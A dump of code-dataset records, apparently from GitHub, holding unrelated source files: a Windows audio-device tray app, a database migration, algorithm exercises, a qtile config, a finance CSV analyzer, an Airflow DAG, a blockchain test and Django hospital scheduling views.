loaded config and started process monitoring worker')\n return True\n else:\n logging.warning(\n 'Failed to load config and start process monitoring')\n return False\n\n # ------------------------------------------------------------------------------------------\n\n def create_worker_threads(self):\n self.thread = ProcessWorker(app=self)\n self.stop_signal.connect(self.thread.stop)\n self.thread.finished.connect(self.thread.deleteLater)\n self.thread.start()\n\n self.create_listener = ProcessWatcher(\"creation\")\n self.stop_signal.connect(self.create_listener.stop)\n self.create_listener.finished.connect(self.create_listener.deleteLater)\n self.create_listener.watcher_signal.connect(\n self.thread.process_started)\n self.create_listener.start()\n\n self.delete_listener = ProcessWatcher(\"deletion\")\n self.stop_signal.connect(self.delete_listener.stop)\n self.delete_listener.finished.connect(self.delete_listener.deleteLater)\n self.delete_listener.watcher_signal.connect(self.thread.process_ended)\n self.delete_listener.start()\n\n # ------------------------------------------------------------------------------------------\n\n def start_worker_thread(self):\n if not self.thread is None:\n self.thread.start()\n\n # ------------------------------------------------------------------------------------------\n\n def start_reload_config(self):\n logging.info('Reloading config file...')\n self.stop_signal.emit()\n self.thread.destroyed.connect(self.finish_reload_config)\n\n # ------------------------------------------------------------------------------------------\n\n def finish_reload_config(self):\n self.load_config_and_start_worker()\n\n # ------------------------------------------------------------------------------------------\n\n def reset_processes(self):\n self.thread.reset_process_states()\n\n # ------------------------------------------------------------------------------------------\n\n def start_quit(self):\n logging.info('Exiting...')\n # end running watcher threads\n self.stop_signal.emit()\n self.thread.destroyed.connect(self.finish_quit)\n\n # ------------------------------------------------------------------------------------------\n\n def finish_quit(self):\n logging.info('Exit')\n self.quit()\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_json(self):\n \"\"\"loads the apps from the apps json file\"\"\"\n # check if the config exists, if not, create one filled with example data\n if os.path.exists(CONFIG_FILE_PATH):\n config = {}\n # load the config file data\n with open(CONFIG_FILE_PATH, \"r\", encoding='UTF-8') as file:\n try:\n config = json.load(file)\n except json.JSONDecodeError:\n logging.error(\n f'Failed to load \\'{CONFIG_FILE_PATH}\\', aborting!')\n finally:\n file.close()\n # load audio valid audio devices, the SoundVolumeView path and apps. Exit if any of these fail.\n if not bool(config) or not self.load_config_data(config) or not self.load_valid_audio_devices() or not self.get_apps_from_config(config):\n return False\n else:\n default_config = {'Config': {'SoundVolumeViewPath': \"SoundVolumeView.exe\"}, 'Apps': {\n 'MyExampleApp1.exe': \"MyExampleAudioDevice\", 'MyExampleApp2.exe': \"MyExampleAudioDevice\", }}\n data = json.dumps(default_config, indent=2)\n # write a default config file if the config doesn't exist\n with open(CONFIG_FILE_PATH, \"w\", encoding='UTF-8') as outfile:\n outfile.write(data)\n outfile.close()\n logging.info(\n f'Created: \\'{CONFIG_FILE_PATH}\\'. Please add your apps to the file and reload the config.')\n self.send_notify(\"Enforce Audio Device Info\",\n f'Created: \\'{os.path.basename(CONFIG_FILE_PATH)}\\'.\\nPlease add your apps to the file and reload the config.', ALERT_ICON_FILE_PATH)\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_data(self, config):\n \"\"\"loads general config data from the config file\"\"\"\n\n has_config = 'Config' in config\n if not has_config:\n logging.warning(\n f'Couldn\\'t find \\'Config\\' section in the config file.')\n\n # checks if the sound volume view tool path is valid and points to a file\n path_valid = False\n if has_config and 'SoundVolumeViewPath' in config['Config']:\n self.sound_volume_view_path = config['Config']['SoundVolumeViewPath']\n if os.path.isfile(self.sound_volume_view_path):\n path_valid = True\n\n if not path_valid:\n logging.error(\n f'Invalid Sound Volume View path \\'{self.sound_volume_view_path}\\'. Make sure the path is set correctly in the Config.json.')\n self.send_notify(\"Enforce Audio Device Error\",\n f'Invalid Sound Volume View path \\'{self.sound_volume_view_path}\\'.\\nMake sure the path is set correctly in the Config.json.', ALERT_ICON_FILE_PATH)\n return False\n\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_valid_audio_devices(self):\n \"\"\"fills a dictionary of valid audio devices that can be used\"\"\"\n # if this file already exists, remove it\n if os.path.isfile(VALID_DEVICES_FILE_PATH):\n os.remove(VALID_DEVICES_FILE_PATH)\n\n # call the soundVolumeView tool and export all audio devices to a json file\n command = f'{self.sound_volume_view_path} /sjson {VALID_DEVICES_FILE_PATH}'\n #res = os.system(command)\n res = subprocess.call(command, shell=False)\n\n if res == 0:\n # try to open the files 10 times, fail if not possible\n for _ in range(10):\n try:\n with open(VALID_DEVICES_FILE_PATH, 'r', encoding='UTF-16') as file:\n data = file.read()\n device_dump = json.loads(data)\n self.load_audio_devices_from_device_json(device_dump)\n file.close()\n os.remove(VALID_DEVICES_FILE_PATH)\n break\n except IOError:\n time.sleep(1)\n else:\n logging.error(\n f'Failed to access default devices in {VALID_DEVICES_FILE_PATH}, SoundVolumeView failed to create the file.')\n return False\n else:\n logging.error(\n f'Finding valid audio devices failed using {command}. Error code = {res}')\n return False\n return True\n\n # ------------------------------------------------------------------------------------------\n\n def load_audio_devices_from_device_json(self, device_dict):\n \"\"\"reads the device dictionary and picks valid output devices\"\"\"\n for device in device_dict:\n if device['Direction'] == 'Render' and device['Type'] == 'Device':\n self.valid_devices.add(device['Name'])\n return\n\n # ------------------------------------------------------------------------------------------\n\n def get_apps_from_config(self, config):\n \"\"\"gets all configured apps from the config\"\"\"\n if 'Apps' in config:\n apps = config['Apps']\n if bool(apps):\n for app in apps:\n self.thread.add_app(app, apps[app])\n return True\n\n logging.warning(\n f'No Apps defined in \\'{CONFIG_FILE_PATH}\\'. Please add apps to the config file and reload the config via the system tray.')\n self.send_notify(\"Enforce Audio Device Error\",\n f'No Apps defined in \\'{os.path.basename(CONFIG_FILE_PATH)}\\'.\\nPlease add apps to the config file and reload the config via the system tray.', ALERT_ICON_FILE_PATH)\n return False\n\n # ------------------------------------------------------------------------------------------\n\n def send_notify(self, title: str, message: str, icon, duration: int = 10):\n notification.notify(\n title=title,\n message=message,\n app_icon=icon,\n app_name=APP_NAME,\n timeout=duration\n )\n\n############################################################################################\n# EnforceAudioDeviceTrayIcon\n############################################################################################\n\n\nclass EnforceAudioDeviceTrayIcon(QSystemTrayIcon):\n\n def __init__(self, app: EnforceAudioDeviceApp):\n super(EnforceAudioDeviceTrayIcon, self).__init__(app)\n self.app = app\n self.create_tray_menu()\n self.act_autostart.setChecked(self.app.settings.contains(APP_NAME))\n\n # ------------------------------------------------------------------------------------------\n\n def create_tray_menu(self):\n icon = QIcon(TRAY_ICON_FILE_PATH)\n self.setToolTip(TRAY_TOOLTIP)\n self.setIcon(icon)\n self.setVisible(True)\n\n # Creating the options\n self.menu = QMenu(\"Options\")\n self.menu.setWindowFlags(self.menu.windowFlags() | Qt.FramelessWindowHint | Qt.NoDropShadowWindowHint)\n self.menu.setAttribute(Qt.WA_TranslucentBackground)\n self.menu.setStyleSheet(f\"\"\"\n QMenu{{\n background-color: #FFFFFF;\n border-image: url(\"{CONTEXT_MENU_BG_FILE_PATH.replace(os.sep, '/')}\") 0 stretch;\n border-radius: 10px;\n }}\n QMenu::item {{\n background-color: transparent;\n padding: 5px 5px;\n margin: 10px 10px;\n }}\n QMenu::item:selected \n {{\n background-color: #fc8c29;\n border-radius: 5px;\n }}\n QMenu::item:disabled {{\n background-color: transparent;\n color: #ffffff;\n font-weight: bold;\n }}\n QMenu::indicator:non-exclusive:checked {{\n image: url(\"{CONTEXT_MENU_CHECKED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:checked:selected {{\n image: url(\"{CONTEXT_MENU_CHECKED_SELECTED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:unchecked {{\n image: url(\"{CONTEXT_MENU_UNCHECKED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::indicator:non-exclusive:unchecked:selected {{\n image: url(\"{CONTEXT_MENU_UNCHECKED_SELECTED_FILE_PATH.replace(os.sep, '/')}\");\n }}\n QMenu::right-arrow {{\n image: url(\"{CONTEXT_MENU_ARROW.replace(os.sep, '/')}\");\n }}\n QMenu::right-arrow:selected {{\n image: url(\"{CONTEXT_MENU_ARROW_SELECTED.replace(os.sep, '/')}\");\n }}\n \"\"\")\n\n self.act_device = self.menu.addAction(\"Enforce Audio Device\")\n self.act_device.setEnabled(False)\n\n # Creating config sub menu\n self.config_menu = QMenu(\"Config\")\n self.config_menu.setWindowFlags(self.menu.windowFlags() | Qt.FramelessWindowHint | Qt.NoDropShadowWindowHint)\n self.config_menu.setAttribute(Qt.WA_TranslucentBackground)\n self.config_menu.setStyleSheet(\"\"\"\n QMenu{\n background-color: #ffffff;\n border: 5px solid #FFFFFF;\n border-radius: 10px;\n }\n QMenu::item {\n background-color: transparent;\n padding: 5px 5px;\n margin: 5px 5px;\n }\n QMenu::item:selected \n { \n background-color: #fc8c29;\n border-radius: 5px\n }\n QMenu::item:disabled {\n background-color: transparent;\n color: #ffffff;\n font-weight: bold;\n }\n \"\"\")\n\n # Create reload config option\n self.act_reload = self.config_menu.addAction(\n \"Reload Config\", self.app.start_reload_config)\n\n self.config_menu.addSeparator()\n\n # Create open config file option\n self.act_open_config = self.config_menu.addAction(\n \"Open Config\", self.open_config_file)\n\n # Create open config folder option\n self.act_open_config_dir = self.config_menu.addAction(\n \"Go to Config\", self.open_config_folder)\n\n self.config_menu.addSeparator()\n\n # Create open log option\n self.act_open_log = self.config_menu.addAction(\n \"Open Log\", self.open_log_file)\n\n # add the config menu to the menu\n self.act_open_config_menu = self.menu.addMenu(self.config_menu)\n\n # Create reset audio devices button\n self.act_reset = self.menu.addAction(\n \"Reset audio devices\", self.app.reset_processes)\n\n # Create autostart option\n self.act_autostart = self.menu.addAction(\n \"Launch on Boot\", self.toggle_autostart_state)\n self.act_autostart.setCheckable(True)\n\n self.menu.addSeparator()\n\n # Create quit option\n self.act_quit = self.menu.addAction(\"Quit\", self.app.start_quit)\n\n # Adding options to the System Tray\n self.setContextMenu(self.menu)\n\n # ------------------------------------------------------------------------------------------\n\n def toggle_autostart_state(self):\n current_state = self.app.settings.contains(APP_NAME)\n new_state = not current_state\n if current_state:\n self.app.settings.remove(APP_NAME)\n else:\n self.app.settings.setValue(APP_NAME, sys.argv[0])\n self.act_autostart.setChecked(new_state)\n logging.info(\n f'Added {APP_NAME} to autostart' if new_state else f'Removed {APP_NAME} from autostart')\n\n # ------------------------------------------------------------------------------------------\n\n def open_config_folder(self):\n path = os.path.dirname(CONFIG_FILE_PATH)\n os.startfile(path)\n\n # ------------------------------------------------------------------------------------------\n\n def open_config_file(self):\n os.startfile(CONFIG_FILE_PATH)\n\n # ------------------------------------------------------------------------------------------\n\n def open_log_file(self):\n os.startfile(LOG_FILE_PATH)\n\n\n# ------------------------------------------------------------------------------------------\n\ndef check_already_running():\n c = wmi.WMI()\n process_name = os.path.basename(sys.argv[0])\n process_count = 0\n for process in c.Win32_Process(name=process_name):\n process_count = process_count + 1\n # two processes are from us, if there are more than 2, another instance is already running\n if process_count > 2:\n return True\n return False\n\n# ------------------------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n if not check_already_running():\n app = EnforceAudioDeviceApp(sys.argv)\n sys.exit(app.exec_())\n","repo_name":"TheCoCe/EnforceAudioDevice","sub_path":"EnforceAudioDevice.py","file_name":"EnforceAudioDevice.py","file_ext":"py","file_size_in_byte":29019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36506601948","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Clean hashmap fields constraints.\n\nRevision ID: c88a06b1cfce\nRevises: f8c799db4aa0\nCreate Date: 2016-05-19 18:06:43.315066\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c88a06b1cfce'\ndown_revision = 'f8c799db4aa0'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\ndef upgrade():\n with op.batch_alter_table(\n 'hashmap_fields',\n # NOTE(sheeprine): Forced reflection is needed because of SQLAlchemy's\n # SQLite backend limitation reflecting ON DELETE clauses.\n reflect_args=[\n sa.Column(\n 'service_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_services.id',\n ondelete='CASCADE',\n name='fk_hashmap_fields_service_id_hashmap_services'),\n nullable=False)]) as batch_op:\n batch_op.drop_constraint(\n 'uniq_field',\n type_='unique')\n batch_op.create_unique_constraint(\n 'uniq_field_per_service',\n ['service_id', 'name'])\n batch_op.drop_constraint(\n 'uniq_map_service_field',\n type_='unique')\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/c88a06b1cfce_clean_hashmap_fields_constraints.py","file_name":"c88a06b1cfce_clean_hashmap_fields_constraints.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"} +{"seq_id":"2134564742","text":"def is_number(x):\n operator = ['+', '*']\n bracket = ['(', ')']\n if x not in operator + bracket:\n return True\n\n\ndef icp(x):\n if x == '*':\n return 2\n elif x == '+':\n return 1\n elif x == '(':\n return 3\n\n\ndef isp(x):\n if x == '*':\n return 2\n elif x == '+':\n return 1\n elif x == '(':\n return 0\n\n\ndef calc(operator, y, x):\n if operator == '+':\n return int(x) + int(y)\n elif operator == '*':\n return int(x)*int(y)\n\n\nfor tc in range(1, 11):\n input()\n stack = []\n result = ''\n for i in input():\n if is_number(i):\n result += i\n elif i == ')':\n while True:\n top = stack.pop()\n if top == '(':\n break\n result += top\n else:\n while stack:\n if icp(i) > isp(stack[-1]):\n stack.append(i)\n break\n else:\n result += stack.pop()\n else:\n stack.append(i)\n while stack:\n result += stack.pop()\n\n for i in result:\n if is_number(i):\n stack.append(i)\n else:\n stack.append(calc(i, stack.pop(), stack.pop()))\n print(f'#{tc} {stack.pop()}')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"SWEA/D04/1224_계산기3.py","file_name":"1224_계산기3.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69888690729","text":"from libqtile import layout, hook\nfrom libqtile.config import Group\n\nfrom modules.keys import get_keys, get_mouse\nfrom modules.layouts import get_layouts\nfrom modules.screens import get_screens\nfrom subprocess import run\n\nwidget_defaults = dict(\n font='sans',\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = []\n\nmeta = \"mod4\"\n\ngroups = [Group(name=i[0], label=i[1]) for i in [(\"F1\", \"work\"), (\"F2\", \"calibre\"), (\"F3\", \"internet\"), (\"F4\", \"discord\"), (\"F5\", \"etc\")]]\n\nkeys = get_keys(groups)\n\nlayouts = get_layouts()\n\n\n# Drag floating layouts.\nmouse = get_mouse()\n\ndgroups_key_binder = None\ndgroups_app_rules = []\n\n\n\nfollow_mouse_focus = False\nbring_front_click = True\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n {'wmclass': 'confirm'},\n {'wmclass': 'dialog'},\n {'wmclass': 'download'},\n {'wmclass': 'error'},\n {'wmclass': 'file_progress'},\n {'wmclass': 'notification'},\n {'wmclass': 'splash'},\n {'wmclass': 'toolbar'},\n {'wmclass': 'confirmreset'}, # gitk\n {'wmclass': 'makebranch'}, # gitk\n {'wmclass': 'maketag'}, # gitk\n {'wname': 'branchdialog'}, # gitk\n {'wname': 'pinentry'}, # GPG key password entry\n {'wmclass': 'ssh-askpass'}, # ssh-askpass\n])\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n\n\ndef main(q):\n screens.clear()\n for screen in get_screens():\n screens.append(screen)\n\n\n@hook.subscribe.screen_change\ndef restart_on_randr(qtile, ev):\n run(\"xrandr --auto\".split())\n run(\"xrandr --output HDMI-1 --right-of eDP-1\".split())\n qtile.cmd_restart()\n\n\n@hook.subscribe.client_new\ndef func(c):\n if c.name in [\"Discord\", \"Activité - Discord\", \"Discord Updater\", \"Telegram\"]:\n c.togroup(\"F4\")\n elif c.name in [\"Mozilla Firefox\"]:\n c.togroup(\"F3\")\n elif c.name in [\"calibre\", \"V calibre\"]:\n c.togroup(\"F2\")\n elif c.name in [\"PyCharm\", \"IntelliJ IDEA\", \"Clion\", \"win0\"]:\n c.togroup(\"F1\")\n","repo_name":"Ara0n/qtile","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725085784","text":"parar = False\n\nsoma = cont = 0\n\nwhile not parar:\n num = int(input('Digite um número [999 para parar]: '))\n if num != 999:\n soma += num\n cont += 1\n else:\n parar = True\n\nprint(f'Você digitou {cont} números e a soma entre eles foi {soma}.')\n\n# PROFESSOR FEZ ASSIM:\n\nnum_1 = cont_1 = soma_1 = 0\n\nnum_1 = int(input('Digite um número [999 para parar]: '))\n\nwhile num_1 != 999:\n soma_1 += num_1\n cont_1 += 1\n num_1 = int(input('Digite um número [999 para parar]: '))\n\nprint(f'Você digitou {cont_1} números e a soma entre eles foi {soma_1}.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"curso_em_video/python/ex064.py","file_name":"ex064.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15797537486","text":"from datetime import date\nimport csv\nimport argparse\n\nimport Command\nimport settings\n\nfrom admin.Init import load_from_csv, create_new_database, load_data_from_files\nimport analytics.Summation\nimport analytics.Category\nfrom analytics import calcpack\nfrom settings import f2s\n\n\ndef list_entries(date_begin, date_end):\n ts = analytics.Summation.TransactionService()\n entries = ts.find(settings.create_date(date_begin), settings.create_date(date_end))\n for e in entries:\n print(e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"CSV input file\", dest=\"csv_data_in\")\n parser.add_argument(\"-p\", \"--file-pattern\", help=\"CSV input files pattern\",\n dest=\"csv_file_pattern\")\n parser.add_argument(\"-i\", \"--initialize\", help=\"create new database\", action=\"store_true\",\n default=False)\n parser.add_argument(\"-c\", \"--command\", help=\"Use command syntax to list entries\", dest=\"command_string\")\n options = parser.parse_args()\n if options.initialize is True:\n create_new_database()\n if options.csv_file_pattern is not None and options.csv_data_in is not None:\n print(\"Choose -f or -p, not both of them\")\n exit(0)\n if options.csv_data_in is not None:\n csv_data_in = options.csv_data_in\n with open(csv_data_in, newline='', encoding='ansi') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';', quotechar='\"')\n load_from_csv(csv_reader)\n if options.csv_file_pattern is not None:\n load_data_from_files(options.csv_file_pattern)\n if options.command_string is not None:\n cmd = Command.Command.create(options.command_string)\n [print(i) for i in cmd.run()]\n exit(0)\n\n list_entries('2018-01-01', '2018-05-01')\n # exit(0)\n year_begin = 2018\n year_end = 2019\n month_interval = 3\n result = calcpack.calculate_interval(year_begin, year_end, month_interval)\n for r in result:\n try: \n print(\"[\", r[0], r[1], \")\", flush=True)\n except:\n print(\"error\", flush=True)\n print(\"Expences: \", r[2], flush=True)\n try:\n print(\"Income: \", r[3], flush=True)\n except:\n print(\"error\", flush=True)\n ts = analytics.Summation.TransactionService()\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n salary = []\n expences = []\n for e in entries:\n if e.amount() > 0:\n salary.append(e.amount())\n else:\n expences.append(e.amount())\n cp = calcpack.CalcPack(salary)\n salary_sum = cp.sum()\n cp = calcpack.CalcPack(expences)\n expences_sum = cp.sum()\n print(\"Salary on [%d, %d): \" % (year_begin, year_end), f2s(salary_sum))\n print(\"Expences on [%d, %d): \" % (year_begin, year_end), f2s(expences_sum))\n print(\"Diff on [%d, %d): \" % (year_begin, year_end), f2s(salary_sum + expences_sum))\n\n s = analytics.Summation.Summation()\n for y in range(year_begin-1, year_end, 1):\n year_sum = s.sum_year(y)\n print(y, f2s(year_sum), f2s(s.sum_year_transfer_amount(y, '57105015041000002310394032')))\n\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n xxx = 0\n cnt = 0\n for e in entries:\n c = analytics.Category.Category()\n cat_id = c.guess(e)\n if cat_id == analytics.Category.CategoryId(analytics.Category.CategoryId.id_6):\n xxx += e.amount()\n cnt += 1\n print(e.date(), f2s(e.amount()), f2s(xxx), c.description(cat_id), flush=True)\n data = {\n 0 : [], -100 : [], -300 : [], -600 : [], -900 : []\n }\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n saldo = 0\n for e in entries:\n if e.amount() > 5000:\n print(e.date(), f2s(e.amount()), f2s(e.saldo_after_transaction()),\n f2s(e.saldo_after_transaction() - saldo), flush=True)\n saldo = e.saldo_after_transaction()\n entries = ts.find(date(year_begin, 1, 1), date(year_end, 1, 1))\n exp = 0\n for e in entries:\n amt = e.amount()\n c = analytics.Category.Category()\n cat_id = c.guess(e)\n if cat_id is None:\n if amt < 0 and amt >= -100:\n data[0].append(amt)\n elif amt < -100 and amt >= -300:\n data[-100].append(amt)\n elif amt < -300 and amt >= -600:\n data[-300].append(amt)\n elif amt < -600 and amt >= -900:\n data[-600].append(amt)\n elif amt < -900:\n data[-900].append(amt)\n for k in data:\n cp = calcpack.CalcPack(data[k])\n if len(data[k]) > 0:\n print(\"%4d\" % k, cp)","repo_name":"aw84/py_lab_02","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72020623849","text":"from airflow import DAG \nfrom airflow.operators.python import PythonOperator \nfrom airflow.operators.empty import EmptyOperator\n\nfrom airflow.utils.dates import days_ago \nfrom datetime import timedelta \n\nimport time \n\ndefault_args = {\n 'start_date': days_ago(1),\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'schedule_interval': '@daily',\n 'tags': ['training'],\n 'catchup': False\n}\n\ndef _sleep_func(sleep_time):\n print('Start sleep {sleep_time} seconds'.format(sleep_time = sleep_time))\n time.sleep(sleep_time) \n\nwith DAG(\n dag_id = 'python-op',\n default_args=default_args,\n tags = ['training']\n) as dag :\n start = EmptyOperator(task_id = 'start_task')\n end = EmptyOperator(task_id = 'end_task')\n \n task1 = PythonOperator(\n task_id = 'python_callable_task1',\n python_callable = _sleep_func,\n op_kwargs = {\"sleep_time\" : 10}\n )\n \n start >> task1 >> end \n \n ","repo_name":"yoonjk/airflow-handson","sub_path":"lab01/python-op.py","file_name":"python-op.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376280887","text":"import allure\n\nfrom integration.tests.basic.helpers.basic import BaseMixin\n\n\n@allure.feature(\"Opcodes verifications\")\n@allure.story(\"Unsupported opcode\")\nclass TestUnsupportedOpcodes(BaseMixin):\n\n def test_basefee(self):\n contract, _ = self.web3_client.deploy_and_get_contract(\n \"EIPs/EIP3198_basefee\", \"0.8.10\", self.sender_account, contract_name=\"basefeeCaller\")\n basefee = contract.functions.baseFee().call()\n assert basefee == 0\n","repo_name":"neonevm/neon-tests","sub_path":"integration/tests/basic/opcodes/test_unsupported_opcodes.py","file_name":"test_unsupported_opcodes.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"7913750046","text":"import datetime\nfrom django.views.generic.edit import FormView\nfrom django.views.generic import ListView, CreateView, UpdateView\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models import Q\nfrom django.shortcuts import render\nfrom .storage import fs\nfrom .man_forms import *\nfrom .models import ScheduleRequest, Schedule, Token, AppointmentHistory\nfrom hosman_web.models import Patient\nfrom hosman_web.modules.storage import store_gContent\n\nclass HistoricalRecordCreateView(CreateView):\n form_class = HistoricalRecordForm\n template_name = 'site/edit/record_keep.html'\n def get(self, request, *args, **kwargs):\n self.object = None\n context = self.get_context_data()\n i = int(request.path.split('/')[5])\n token = Token.objects.get(id=i)\n context['form'].fields['date'].initial = token.date\n context['form'].fields['doctor'].initial = token.schedule.doctor\n context['form'].fields['patient'].initial = token.patient\n context['form'].fields['center'].initial = request.site\n return self.render_to_response(context)\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST, request.FILES)\n if form.is_valid():\n obj = form.save(commit=False)\n media = request.FILES['content']\n obj.content = media\n print(fs.location)\n print(\"=\"*80)\n obj = store_gContent(obj.patient.user.username, obj, location=fs.location+'/')\n obj.save()\n url = f\"../../../../../update/{Token.objects.get(id=int(request.path.split('/')[5])).schedule.id}/token/\"\n return HttpResponseRedirect(url)\n return render(request, self.template_name, {'form': form})\n\nclass TokenView(ListView):\n model = Token\n template_name = 'site/token.html'\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object_list = self.model._default_manager.filter(schedule=int(request.path.replace('/', ' ').split()[3]))\n allow_empty = self.get_allow_empty()\n if not allow_empty:\n if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n is_empty = not self.object_list.exists()\n else:\n is_empty = not self.object_list\n if is_empty:\n raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n 'class_name': self.__class__.__name__,\n })\n context = self.get_context_data()\n return self.render_to_response(context)\n return HttpResponse('Error 610!')\n\nclass TokenCreateView(CreateView):\n form_class = TokenForm\n template_name = 'site/edit/token.html'\n success_url = \"../\"\n def get(self, request, *args, **kwargs):\n self.object = None\n context = self.get_context_data()\n i = int(request.path.replace('/', ' ').split()[3])\n schedule = Schedule.objects.get(id=i)\n serial = Token.objects.filter(schedule=schedule).count()\n day = datetime.date.today()\n wd = day.weekday()\n timedelta = schedule.day_of_week - wd if schedule.day_of_week > wd else schedule.day_of_week + 7 - wd if schedule.day_of_week < wd else 0\n day += datetime.timedelta(days=timedelta)\n context['form'].fields['schedule'].initial = schedule\n context['form'].fields['date'].initial = day\n context['form'].fields['serial'].initial = serial + 1\n if request.user.is_authenticated:\n patient = Patient.objects.get(user=request.user)\n revisit = AppointmentHistory.objects.filter(patient=patient, doctor=schedule.doctor, center=schedule.center).count() > 0\n context['form'].fields['tokenie_logged'].initial = True\n context['form'].fields['revisit'].initial = revisit\n context['form'].fields['patient_name'].initial = patient.__str__()\n context['form'].fields['patient'].initial = patient\n else:\n context['form'].fields['patient'].initial = request.user\n return self.render_to_response(context)\n\nclass ScheduleCreateView(CreateView):\n form_class = ScheduleForm\n template_name = 'site/edit/schedule.html'\n success_url = '../'\n def post(self, request, *args, **kwargs):\n self.object = None\n form = self.get_form()\n if form.is_valid():\n obj = form.save()\n sr = ScheduleRequest.objects.create(schedule=obj, made_by=Patient.objects.get(user=request.user), request=\"C\")\n sr.save()\n return HttpResponseRedirect(self.success_url)\n return render(request, self.template_name, {'form': form})\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object = None\n context = self.get_context_data()\n context['form'].fields['center'].initial = request.site\n if request.privilege == 'employee':\n context['form'].fields['receptionist'].initial = request.user\n elif request.privilege == 'doctor':\n context['form'].fields['doctor'].initial = request.user\n super().get(request, *args, **kwargs)\n return self.render_to_response(context)\n return HttpResponse(\"Error 610\")\n\nclass ScheduleView(ListView):\n model = Schedule\n template_name = 'site/schedule.html'\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object_list = self.model._default_manager.filter(center=request.site)\n srs = ScheduleRequest.objects.filter(schedule__center=request.site)\n for i, _ in enumerate(srs):\n self.object_list = self.object_list.exclude(id=srs[i].schedule)\n allow_empty = self.get_allow_empty()\n if not allow_empty:\n if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n is_empty = not self.object_list.exists()\n else:\n is_empty = not self.object_list\n if is_empty:\n raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n 'class_name': self.__class__.__name__,\n })\n context = self.get_context_data()\n return self.render_to_response(context)\n return HttpResponse('Error 610!')\n\nclass ScheduleUpdateView(UpdateView):\n model = Schedule\n form_class = ScheduleForm\n template_name = 'site/edit/schedule.html'\n success_url = \"../../\"\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n if form.is_valid():\n retain_old = self.get_object()\n sr_test = ScheduleRequest.objects.filter(schedule__center=retain_old.center, schedule__office_no=retain_old.office_no, request=\"R\")\n obj = form.save()\n if sr_test.count() == 0:\n dup_old = Schedule.objects.create(\n start_time=retain_old.start_time, \n end_time=retain_old.end_time,\n day_of_week=retain_old.day_of_week,\n office_no=retain_old.office_no,\n phone=retain_old.phone,\n fee_1st=retain_old.fee_1st,\n fee_revisit=retain_old.fee_revisit,\n receptionist=retain_old.receptionist,\n doctor=retain_old.doctor,\n center=retain_old.center\n )\n dup_old.save()\n sr_ret = ScheduleRequest.objects.create(schedule=dup_old, made_by=Patient.objects.get(user=request.user), request=\"R\", ref_id=obj.id)\n 